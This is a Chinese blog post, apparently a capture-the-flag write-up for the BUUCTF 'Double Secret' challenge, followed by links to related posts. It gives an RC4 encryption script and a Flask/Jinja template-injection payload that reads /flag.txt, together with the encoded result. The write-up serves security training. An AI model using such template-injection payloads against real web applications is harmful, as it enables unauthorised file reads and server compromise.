[CISCN2019 华东南赛区]Double Secret

最新推荐文章于 2023-11-12 16:48:30 发布
最新推荐文章于 2023-11-12 16:48:30 发布
阅读量93 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/130512466
版权

访问secret

GET传secret

输入不同的数字有不同的返回结果,看不出有什么规律

输入111111,发现

让GPT解释一下

可以看到这里RC4加密的密钥就是HereIsTreasure

而且可以看到是flask的模板,那么就可以联系到SSTI

RC4加密脚本:

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))  
    # print("原来的 s 盒:%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒:%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是:%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")

re4_main函数第一个参数就是密钥

运行脚本得到

.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

传参得到flag

 

超级兵_140
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
华东师范大学2019 839.docx
06-25
华东师范大学计算机技术(085211)839 2019年真题回忆版以及答案
BUUCTF:[CISCN2019 华东赛区]Double Secret
末初的CSDN博客
04-21 1363
BUUCTF:[CISCN2019 华东赛区]Double Secret 查看robots.txt 无可用信息 线索在目录:http://274c1aad-138b-4fe6-9815-8feeaf028127.node3.buuoj.cn/secret 尝试传参?secret= 发现当字符串长度超过4位的时候,出现报错 寻找关键代码 这里调用了rc4再通过render_templat...
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1807
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
华东师范大学2019计算机考研839试卷及答案
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
第九届飞思卡尔摄像头华东赛区一等奖程序
08-24
参加第九届飞思卡尔智能车竞赛,并获得华东赛区一等奖,主控芯片是K60,摄像头用的是OV7620,图像读取用的是DMA。
[CISCN2019 华东赛区]Double Secret——还要加密?
Mrs_H的博客
11-17 274
[CISCN2019 华东赛区]Double Secret 一.前言 这波属于是忙里偷闲了,面对着几篇大作业却没有任何思绪的我,默默打开了BUU的靶场,开始了我的“偷闲”之旅(doge。可能是最近临近期末的缘故,各个老师的作业数量都开始发力了。上个学期还都是1000字,1500字,最多也就3000字,这学期倒好上来直接8000大作业,直接给我干蒙了。算了,废话不多说了直接看题吧。 二.正文 首先,老样子先截一个“案发现场”的图 经典的没有前端界面,他让我们来找secret,所以我们去访问一下secret
[CISCN 2019华东]Double Secret
ph0ebus的博客
02-07 779
从一道赛题学习关于flask的模板注入和了解RC4加密
题解([RootersCTF2019]I_<3_Flask,[CISCN2019 华东赛区]Double Secret,[CISCN2019 华东赛区]Web4)
2202_75361164的博客
11-12 159
抓取/flag,并且将session更改为:eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZUjA4g.TDHugXodYeccRQbQmc1SZh9CffA。直接看/flag路由,发现session[‘username’] == 'fuck’时给flag,所以要伪造session,不过我们需要先得到密钥。发现被过滤了,有点不对劲,尝试/index.php发现404,推测为python,尝试。成功,尝试读取/flag,被过滤了。3.读取/app/app.py。
[CISCN2019 华东赛区]Double Secret flask模板 rc4加密
qq_62046696的博客
10-30 374
因为这是python中的flask模板界面,所以我们自然而然地可以想到用ssti模板注入。这里应该是进行了rc4的加密,解密密钥是HereIsTreasure。打开界面,这种要么让我们访问Secret页面,要么传参Secret。这里记得大小写的Secret都要尝试,然后让我们传参一个secret。以前碰到过这样进行输入源码,打算用脚本爆破,试一个比较大的值。需要一个rc4加密脚本,从网上搜一个。
[CISCN2019 华东赛区]Double Secret flask的debug
qq_54929891的博客
04-10 1228
打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来) 进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件) robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助 secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试
BUUCTF--[CISCN2019 华东赛区]Double Secret
qq_46263951的博客
07-18 762
首先进入页面后发现只有短短的一句话Welcome To Find Secret 看大佬们都是直接猜出来的/secret目录的,由于能力有限老老实实地用dirsearch扫出来了 进入目录后提示Tell me your secret.I will encrypt it so others can't see import base64 from urllib.parse import quote def rc4_main(key = "init_key", message = "init_mes.
SSTI简单总结和例题
Aiwin的博客
07-21 2597
SSTI简单总结和例题CISCN 2019华东]Double Secret和[护网杯 2018]easy_tornado
2024华东杯数学建模
最新发布
05-03
2024华东杯数学建模是一项面向大学生的数学建模竞赛活动,旨在培养学生的数学建模能力和团队合作精神。该比赛通常由华东地区的高校或研究机构主办,参赛队伍来自各个大学。 在比赛中,参赛队伍需要根据给定的实际问题,运用数学方法和计算机技术,进行问题分析、建立数学模型、进行数值计算和结果分析等一系列工作。参赛队伍需要在规定的时间内完成模型的建立和求解,并撰写一份完整的报告。 2024华东杯数学建模竞赛通常包括两个阶段:初赛和决赛。初赛阶段,参赛队伍需要在线上进行模拟考试,解答一系列与实际问题相关的数学建模题目。决赛阶段,获得初赛资格的队伍将被邀请到指定地点进行现场决赛,进行更加复杂和综合性的数学建模挑战。 该竞赛不仅考察参赛队伍的数学知识和建模能力,还注重团队合作和创新思维。通过参与2024华东杯数学建模,学生可以提高自己的问题解决能力、团队协作能力和创新思维能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值